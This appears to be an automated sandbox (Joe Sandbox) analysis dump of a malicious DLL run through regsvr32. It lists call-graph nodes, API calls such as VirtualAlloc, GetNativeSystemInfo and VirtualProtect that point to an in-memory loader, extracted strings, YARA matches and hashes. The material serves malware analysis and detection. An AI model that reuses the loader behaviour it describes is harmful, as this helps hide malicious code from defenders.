16366->16368 16371 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16367->16371 16377 7fef9d2c260 16367->16377 16369 7fef9d26e89 16368->16369 16369->16360 16381 7fef9d2c0c0 16371->16381 16373 7fef9d26e12 16373->16360 16374 7fef9d26dc7 16374->16373 16384 7fef9d26ea0 16374->16384 16376->16350 16378 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16377->16378 16380 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16378->16380 16388 7fef9d2f4d0 16378->16388 16380->16371 16399 7fef9d32260 16381->16399 16383 7fef9d2c103 16383->16374 16385 7fef9d26ebd 16384->16385 16386 7fef9d26ed1 16384->16386 16385->16386 16387 7fef9d2be00 _invalid_parameter 16 API calls 16385->16387 16386->16373 16387->16386 16389 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16388->16389 16392 7fef9d2f570 16389->16392 16391 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16391->16380 16393 7fef9d2f599 MultiByteToWideChar 16392->16393 16395 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16393->16395 16396 7fef9d2f60b malloc _calloc_dbg_impl _MarkAllocaS 16393->16396 16395->16391 16396->16395 16397 7fef9d2f68b MultiByteToWideChar 16396->16397 16397->16395 16398 7fef9d2f6ca GetStringTypeW 16397->16398 16398->16395 16400 7fef9d3228b 16399->16400 16401 7fef9d322e1 16400->16401 16402 7fef9d3231f 16400->16402 16403 7fef9d2bd70 _invalid_parameter 17 API calls 16401->16403 16404 7fef9d32385 16402->16404 16407 7fef9d323c3 _calloc_dbg_impl 16402->16407 16406 7fef9d32315 _calloc_dbg_impl 16403->16406 16405 7fef9d2bd70 _invalid_parameter 17 API calls 16404->16405 16405->16406 16406->16383 16407->16406 16408 7fef9d2bd70 _invalid_parameter 17 API calls 16407->16408 16408->16406 16409->16299 16411 7fef9d274b2 GetProcAddress 16410->16411 16412 7fef9d274d1 ExitProcess 16410->16412 16411->16412 16416 7fef9d290be 16413->16416 16414 7fef9d290fd DeleteCriticalSection 16414->16416 16415 7fef9d234a0 16415->16252 16416->16414 16417 7fef9d2914d 16416->16417 16417->16415 16418 7fef9d29196 DeleteCriticalSection 16417->16418 16418->16417 16456 7fef9d28670 GetEnvironmentStringsW 16457 7fef9d28690 16456->16457 16459 7fef9d28697 WideCharToMultiByte 16456->16459 16460 7fef9d2875f FreeEnvironmentStringsW 16459->16460 16461 7fef9d28733 16459->16461 16460->16457 16461->16460 16462 7fef9d2876e WideCharToMultiByte 16461->16462 16463 7fef9d287c2 FreeEnvironmentStringsW 16462->16463 16464 7fef9d287aa 16462->16464 16463->16457 16464->16463 17365 7fef9d3e16f 17366 7fef9d3e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 17365->17366 17367 7fef9d3eadf 17366->17367 17377 7fef9d3da75 17366->17377 17388 7fef9d3eec0 17366->17388 17392 7fef9d3ef10 17367->17392 17370 7fef9d3eafd 17371 7fef9d3eb33 17370->17371 17373 7fef9d3eec0 25 API calls 17370->17373 17372 7fef9d3ec29 17371->17372 17386 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17371->17386 17374 7fef9d3ebda 17372->17374 17375 7fef9d3ef10 25 API calls 17372->17375 17373->17371 17374->17377 17379 7fef9d3eec0 25 API calls 17374->17379 17375->17374 17376 7fef9d3eca1 17378 7fef9d2bd70 _invalid_parameter 17 API calls 17376->17378 17381 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17376->17381 17377->17376 17382 7fef9d3dbb5 17377->17382 17378->17381 17379->17377 17380 7fef9d23280 __GSHandlerCheck 8 API calls 17383 7fef9d3ed9e 17380->17383 17381->17380 17385 7fef9d2bd70 _invalid_parameter 17 API calls 17382->17385 17385->17381 17386->17374 17396 7fef9d3f000 17386->17396 17403 7fef9d3ee40 17386->17403 17390 7fef9d3eed7 17388->17390 17389 7fef9d3ee40 25 API calls 17389->17390 17390->17389 17391 7fef9d3ef07 17390->17391 17391->17367 17394 7fef9d3ef2c 17392->17394 17393 7fef9d3ef4d 17393->17370 17394->17393 17395 7fef9d3ee40 25 API calls 17394->17395 17395->17394 17397 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17396->17397 17400 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17396->17400 17398 7fef9d3f276 _CrtMemDumpAllObjectsSince 17397->17398 17397->17400 17401 7fef9d3f146 _CrtMemDumpAllObjectsSince 17397->17401 17399 7fef9d3f29d MultiByteToWideChar 17398->17399 17399->17400 17400->17386 17401->17400 17402 7fef9d3f1b5 MultiByteToWideChar 17401->17402 17402->17400 17404 7fef9d3ee62 17403->17404 17406 7fef9d3ee6e 17404->17406 17407 7fef9d3f360 17404->17407 17406->17386 17408 7fef9d3f719 17407->17408 17409 7fef9d3f399 17407->17409 17411 7fef9d40170 23 API calls 17408->17411 17442 7fef9d3f4f2 17408->17442 17410 7fef9d3afb0 _fflush_nolock 17 API calls 17409->17410 17412 7fef9d3f3a6 17410->17412 17411->17442 17413 7fef9d3f3ed 17412->17413 17415 7fef9d3afb0 _fflush_nolock 17 API calls 17412->17415 17418 7fef9d3f4c7 17413->17418 17419 7fef9d3afb0 _fflush_nolock 17 API calls 17413->17419 17414 7fef9d23280 __GSHandlerCheck 8 API calls 17416 7fef9d3f7c5 17414->17416 17417 7fef9d3f3b8 17415->17417 17416->17406 17417->17413 17420 7fef9d3afb0 _fflush_nolock 17 API calls 17417->17420 17421 7fef9d40170 23 API calls 17418->17421 17418->17442 17422 7fef9d3f43d 17419->17422 17423 7fef9d3f3ca 17420->17423 17421->17442 17424 7fef9d3f484 17422->17424 17426 7fef9d3afb0 _fflush_nolock 17 API calls 17422->17426 17425 7fef9d3afb0 _fflush_nolock 17 API calls 17423->17425 17424->17418 17427 7fef9d3f561 17424->17427 17425->17413 17428 7fef9d3f44f 17426->17428 17429 7fef9d3afb0 _fflush_nolock 17 API calls 17427->17429 17428->17424 17430 7fef9d3afb0 _fflush_nolock 17 API calls 17428->17430 17431 7fef9d3f56e 17429->17431 17432 7fef9d3f461 17430->17432 17433 7fef9d3f5b8 17431->17433 17434 7fef9d3afb0 _fflush_nolock 17 API calls 17431->17434 17435 7fef9d3afb0 _fflush_nolock 17 API calls 17432->17435 17433->17408 17437 7fef9d3f604 17433->17437 17436 7fef9d3f580 17434->17436 17435->17424 17436->17433 17439 7fef9d3afb0 _fflush_nolock 17 API calls 17436->17439 17438 7fef9d3b530 wctomb_s 19 API calls 17437->17438 17438->17442 17440 7fef9d3f592 17439->17440 17441 7fef9d3afb0 _fflush_nolock 17 API calls 17440->17441 17441->17433 17442->17414 18442 7fef9d41370 18443 7fef9d3af60 _unlock_file2 2 API calls 18442->18443 18444 7fef9d41390 18443->18444 16612 7fef9d28860 HeapCreate 16613 7fef9d28891 GetVersion 16612->16613 16614 7fef9d2888d 16612->16614 16615 7fef9d288c1 16613->16615 16616 7fef9d288a7 HeapSetInformation 16613->16616 16615->16614 16616->16615 18445 7fef9d31b64 18447 7fef9d31b9d 18445->18447 18446 7fef9d3ab10 17 API calls 18448 7fef9d31c86 18446->18448 18447->18446 18447->18448 18449 7fef9d31bed 18447->18449 18448->18449 18450 7fef9d39290 23 API calls 18448->18450 18450->18449 18877 7fef9d35260 18878 7fef9d35296 __SehTransFilter _CreateFrameInfo 18877->18878 18879 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18878->18879 18880 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18879->18880 17443 7fef9d41160 17446 7fef9d34e90 17443->17446 17445 7fef9d41179 17447 7fef9d34ebb 17446->17447 17448 7fef9d34ecf 17446->17448 17447->17448 17449 7fef9d2cf50 terminate 35 API calls 17447->17449 17448->17445 17449->17448 18458 7fef9d3bb66 18459 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18458->18459 18460 7fef9d3bc46 18459->18460 18462 7fef9d3b99c 18459->18462 18461 7fef9d2bd70 _invalid_parameter 17 API calls 18460->18461 18466 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18461->18466 18463 7fef9d3cc93 18462->18463 18467 7fef9d3bada 18462->18467 18464 7fef9d2bd70 _invalid_parameter 17 API calls 18463->18464 18463->18466 18464->18466 18465 7fef9d23280 __GSHandlerCheck 8 API calls 18468 7fef9d3cd90 18465->18468 18466->18465 18469 7fef9d2bd70 _invalid_parameter 17 API calls 18467->18469 18469->18466

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                                                        • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                                                        • API String ID: 2181984824-2032897877
                                                                                        • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                        • Instruction ID: 1e3beb4b4c43f569e156fbbbb3a48c6786d138466eab30fa5612b4063b7ac052
                                                                                        • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                        • Instruction Fuzzy Hash: 72E2C9B690A7C18FE3748F629E857DD3AA0F345748F609208D3991FA1DCB795242CF86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 15 1c0000-1c0460 call 1c0aa8 * 2 VirtualAlloc 37 1c048a-1c0494 15->37 38 1c0462-1c0466 15->38 41 1c049a-1c049e 37->41 42 1c0a91-1c0aa6 37->42 39 1c0468-1c0488 38->39 39->37 39->39 41->42 43 1c04a4-1c04a8 41->43 43->42 44 1c04ae-1c04b2 43->44 44->42 45 1c04b8-1c04bf 44->45 45->42 46 1c04c5-1c04d2 45->46 46->42 47 1c04d8-1c04e1 46->47 47->42 48 1c04e7-1c04f4 47->48 48->42 49 1c04fa-1c0507 48->49 50 1c0509-1c0511 49->50 51 1c0531-1c0567 GetNativeSystemInfo 49->51 52 1c0513-1c0518 50->52 51->42 53 1c056d-1c0589 VirtualAlloc 51->53 54 1c051a-1c051f 52->54 55 1c0521 52->55 56 1c058b-1c059e 53->56 57 1c05a0-1c05ac 53->57 58 1c0523-1c052f 54->58 55->58 56->57 59 1c05af-1c05b2 57->59 58->51 58->52 61 1c05b4-1c05bf 59->61 62 1c05c1-1c05db 59->62 61->59 63 1c05dd-1c05e2 62->63 64 1c061b-1c0622 62->64 65 1c05e4-1c05ea 63->65 66 1c0628-1c062f 64->66 67 1c06db-1c06e2 64->67 68 1c05ec-1c0609 65->68 69 1c060b-1c0619 65->69 66->67 70 1c0635-1c0642 66->70 71 1c06e8-1c06f9 67->71 72 1c0864-1c086b 67->72 68->68 68->69 69->64 69->65 70->67 75 1c0648-1c064f 70->75 76 1c0702-1c0705 71->76 73 1c0917-1c0929 72->73 74 1c0871-1c087f 72->74 77 1c092f-1c0937 73->77 78 1c0a07-1c0a1a 73->78 79 1c090e-1c0911 74->79 80 1c0654-1c0658 75->80 81 1c06fb-1c06ff 76->81 82 1c0707-1c070a 76->82 84 1c093b-1c093f 77->84 105 1c0a1c-1c0a27 78->105 106 1c0a40-1c0a4a 78->106 79->73 83 1c0884-1c08a9 79->83 85 1c06c0-1c06ca 80->85 81->76 86 1c070c-1c071d 82->86 87 1c0788-1c078e 82->87 110 1c08ab-1c08b1 83->110 111 1c0907-1c090c 83->111 90 1c09ec-1c09fa 84->90 91 1c0945-1c095a 84->91 88 1c06cc-1c06d2 85->88 89 1c065a-1c0669 85->89 92 1c071f-1c0720 86->92 93 1c0794-1c07a2 86->93 87->93 88->80 97 1c06d4-1c06d5 88->97 101 1c067a-1c067e 89->101 102 1c066b-1c0678 89->102 90->84 103 1c0a00-1c0a01 90->103 99 1c095c-1c095e 91->99 100 1c097b-1c097d 91->100 104 1c0722-1c0784 92->104 95 1c085d-1c085e 93->95 96 1c07a8 93->96 95->72 107 1c07ae-1c07d4 96->107 97->67 112 1c096e-1c0979 99->112 113 1c0960-1c096c 99->113 115 1c097f-1c0981 100->115 116 1c09a2-1c09a4 100->116 117 1c068c-1c0690 101->117 118 1c0680-1c068a 101->118 114 1c06bd-1c06be 102->114 103->78 104->104 119 1c0786 104->119 120 1c0a38-1c0a3e 105->120 108 1c0a4c-1c0a54 106->108 109 1c0a7b-1c0a8e 106->109 142 1c0835-1c0839 107->142 143 1c07d6-1c07d9 107->143 108->109 122 1c0a56-1c0a78 108->122 109->42 131 1c08bb-1c08c8 110->131 132 1c08b3-1c08b9 110->132 111->79 123 1c09be-1c09bf 112->123 113->123 114->85 124 1c0989-1c098b 115->124 125 1c0983-1c0987 115->125 129 1c09ac-1c09bb 116->129 130 1c09a6-1c09aa 116->130 127 1c06a5-1c06a9 117->127 128 1c0692-1c06a3 117->128 126 1c06b6-1c06ba 118->126 119->93 120->106 121 1c0a29-1c0a35 120->121 121->120 122->109 137 1c09c5-1c09cb 123->137 124->116 135 1c098d-1c098f 124->135 125->123 126->114 127->114 136 1c06ab-1c06b3 127->136 128->126 129->123 130->123 139 1c08ca-1c08d1 131->139 140 1c08d3-1c08e5 131->140 138 1c08ea-1c08fe 132->138 144 1c0999-1c09a0 135->144 145 1c0991-1c0997 135->145 136->126 146 1c09cd-1c09d3 137->146 147 1c09d9-1c09e9 VirtualProtect 137->147 138->111 153 1c0900-1c0905 138->153 139->139 139->140 140->138 150 1c083b 142->150 151 1c0844-1c0850 142->151 148 1c07db-1c07e1 143->148 149 1c07e3-1c07f0 143->149 144->137 145->123 146->147 147->90 154 1c0812-1c082c 148->154 155 1c07fb-1c080d 149->155 156 1c07f2-1c07f9 149->156 150->151 151->107 157 1c0856-1c0857 151->157 153->110 154->142 159 1c082e-1c0833 154->159 155->154 156->155 156->156 157->95 159->143
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.926868949.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1c0000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                        • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                        • API String ID: 2313188843-2517549848
                                                                                        • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                        • Instruction ID: f654c121e0f75809087bb2166a3c52b90b1e84719569e0c161f38774067afe60
                                                                                        • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                        • Instruction Fuzzy Hash: AD72B531618B48CBDB2DDF18C885BB9B7E1FBA8305F14462DE88AD7211DB34D946CB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 344 18002b7b2-18002b823 call 1800075b8 346 18002b828-18002b836 344->346 347 18002b83c-18002b848 346->347 348 18002b769-18002b76f 347->348 349 18002b775 348->349 350 18002b9bc-18002b9c2 348->350 351 18002b77b-18002b781 349->351 352 18002be19-18002be67 call 180024104 349->352 353 18002bdb2-18002bdfb call 180024104 350->353 354 18002b9c8-18002b9ce 350->354 355 18002b9b2-18002b9b7 351->355 356 18002b787-18002b78d 351->356 367 18002be6c-18002be8c 352->367 374 18002be00-18002be09 353->374 357 18002b9d4-18002b9da 354->357 358 18002bc32-18002bdb0 call 180003a18 call 18001958c 354->358 355->348 362 18002b793-18002b799 356->362 363 18002b91c-18002b9a3 call 18001a6a8 356->363 364 18002bb99-18002bc22 call 180029374 357->364 365 18002b9e0-18002b9e6 357->365 358->374 370 18002b867-18002b917 call 180029374 362->370 371 18002b79f-18002b7a5 362->371 377 18002b9a8-18002b9ad 363->377 364->367 384 18002bc28-18002bc2d 364->384 372 18002be0c-18002be12 365->372 373 18002b9ec-18002bafc call 180018fd8 365->373 370->347 379 18002b7ab-18002b7b1 371->379 380 18002b84d-18002b862 371->380 372->367 382 18002be14 372->382 373->377 388 18002bb02-18002bb94 call 180013fc0 373->388 374->372 377->347 379->344 379->372 380->348 382->348 384->347 388->347
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: j$BaG$E^7$i1V$m?${=/
                                                                                        • API String ID: 0-1718370006
                                                                                        • Opcode ID: 7e95e28927a3f474dec44438ef6f7c2193a6ae12a65f48f1ee29bcd4551fec0f
                                                                                        • Instruction ID: c2786c6f7bce021451845d5168b6505f680b7f0c5368ce25f063ff62f9696b2b
                                                                                        • Opcode Fuzzy Hash: 7e95e28927a3f474dec44438ef6f7c2193a6ae12a65f48f1ee29bcd4551fec0f
                                                                                        • Instruction Fuzzy Hash: 64223B70E4870DDBCB59DFA8C4AA6DEBBF6FB44344F0081A9D805A7290DB74560ACB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $E$&C$b $z_o^$]o-
                                                                                        • API String ID: 0-182765021
                                                                                        • Opcode ID: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                                                        • Instruction ID: b82cae2a5c5b3167ef3d8ad315f999371e1e8449cd72bf967428ee4211bfb190
                                                                                        • Opcode Fuzzy Hash: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                                                        • Instruction Fuzzy Hash: 5CE1277151468CDFDF88DF28C889ADD3BA1FB483A8F956219FD0A97250D774D888CB84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8$?I $k?@`${>K$s
                                                                                        • API String ID: 0-923624899
                                                                                        • Opcode ID: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                                                        • Instruction ID: ebffd08f5432af4d9268e2276ec0df8890e8c351c8fd12e1d0a52c84a5ba0a07
                                                                                        • Opcode Fuzzy Hash: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                                                        • Instruction Fuzzy Hash: F4C1F070519784ABC388DF24C4CA95BBBF1FBD4758F906A1CF9C68A260D774D948CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 441 18000e99c-18000e9ca 442 18000e9cc 441->442 443 18000e9ce-18000e9d4 442->443 444 18000e9da-18000e9e0 443->444 445 18000ee1d-18000f007 call 1800138d0 call 180028908 443->445 446 18000ee13-18000ee18 444->446 447 18000e9e6-18000e9ec 444->447 462 18000f009 445->462 463 18000f00e-18000f202 call 180028908 call 180017d54 445->463 446->443 449 18000e9f2-18000e9f8 447->449 450 18000ea99-18000eaa6 447->450 452 18000f20d-18000f213 449->452 453 18000e9fe-18000ea89 call 180028724 449->453 455 18000eaa8-18000eaae 450->455 456 18000eab0-18000ead3 450->456 452->443 457 18000f219-18000f226 452->457 453->457 465 18000ea8f-18000ea94 453->465 460 18000ead9-18000edf1 call 180001000 call 180028908 call 180017d54 455->460 456->460 475 18000edf6-18000edfe 460->475 462->463 463->442 474 18000f208 463->474 465->443 474->452 475->457 476 18000ee04-18000ee0e 475->476 476->443
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &k8$,8$\$`/U
                                                                                        • API String ID: 0-956392518
                                                                                        • Opcode ID: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                                                        • Instruction ID: eb6f1617cd975c6e10cf27e40abea16f203efbb492656816d2660eb5cb9ff966
                                                                                        • Opcode Fuzzy Hash: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                                                        • Instruction Fuzzy Hash: 7D2215715093C88BDBBECF64C889BDA7BB9FB44708F10561CEA4A9E258DB745748CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 477 7fef9d28860-7fef9d2888b HeapCreate 478 7fef9d28891-7fef9d288a5 GetVersion 477->478 479 7fef9d2888d-7fef9d2888f 477->479 481 7fef9d288c1 478->481 482 7fef9d288a7-7fef9d288bb HeapSetInformation 478->482 480 7fef9d288c6-7fef9d288ca 479->480 481->480 482->481
                                                                                        APIs
                                                                                        • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                                                                        • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                                                                        • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CreateInformationVersion
                                                                                        • String ID:
                                                                                        • API String ID: 3563531100-0
                                                                                        • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                        • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                                                                        • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                                                        • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 483 180025a4c-180025a83 484 180025a85-180025a8a 483->484 485 180025f34-180025f39 call 180016da8 484->485 486 180025a90-180025a95 484->486 497 180025f3e-180025f43 485->497 487 180025a9b-180025aa0 486->487 488 180025e5e-180025f2f call 180029374 486->488 490 180025e35-180025e53 487->490 491 180025aa6-180025aab 487->491 488->484 490->488 494 180025ab1-180025ab6 491->494 495 180025cff-180025e1c call 180001000 491->495 499 180025abc-180025ac1 494->499 500 180025cf0-180025cfa 494->500 503 180025e21-180025e30 495->503 501 180025f49 497->501 502 180026060-18002606d 497->502 504 180025c24-180025ce1 call 18001958c 499->504 505 180025ac7-180025acc 499->505 500->484 501->484 503->484 509 180025ce6-180025ceb 504->509 507 180025ad2-180025ad7 505->507 508 180025f4e-18002605a call 180028724 call 18001c064 505->508 507->497 511 180025add-180025bf1 call 180020048 507->511 508->502 509->484 515 180025bf6-180025bfc 511->515 517 180025c1a-180025c1f 515->517 518 180025bfe-180025c15 515->518 517->484 518->484
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6"*n$US8$z:7
                                                                                        • API String ID: 0-1851205513
                                                                                        • Opcode ID: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                                                        • Instruction ID: 607295142d9547307d046de48b3748fa472aee76cf77032a28cf9f5936a2d7e5
                                                                                        • Opcode Fuzzy Hash: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                                                        • Instruction Fuzzy Hash: 57E1F9706057889FEBBADF24C88A7DE7BA1FB49744F50422DDC8A8E250DB745648CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 519 180020118-180020142 520 180020147-18002014c 519->520 521 180020152-180020157 520->521 522 180020380-1800203f5 call 1800075b8 520->522 523 180020358-180020366 521->523 524 18002015d-180020162 521->524 535 180020401 522->535 536 1800203f7-1800203fc 522->536 526 18002036c-180020370 523->526 527 180020412-180020484 call 18001958c 524->527 528 180020168-18002016d 524->528 533 180020372-18002037b 526->533 534 180020368-180020369 526->534 537 180020489-180020495 527->537 531 180020173-180020178 528->531 532 18002034e-180020353 528->532 538 1800202c8-180020349 call 18001958c 531->538 539 18002017e-180020183 531->539 532->520 533->520 534->526 540 180020406-18002040b 535->540 536->520 538->520 543 180020189-18002018e 539->543 544 18002021d-1800202ad call 180020048 539->544 540->537 541 18002040d 540->541 541->520 543->540 546 180020194-180020218 call 1800011f4 543->546 548 1800202b2-1800202b8 544->548 546->520 548->537 550 1800202be-1800202c3 548->550 550->520
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: -;$-;$00
                                                                                        • API String ID: 0-2539125404
                                                                                        • Opcode ID: 4bebef8070dd7c101eddf85a5aa64f5999e83061b5374efcb24450239016e0dd
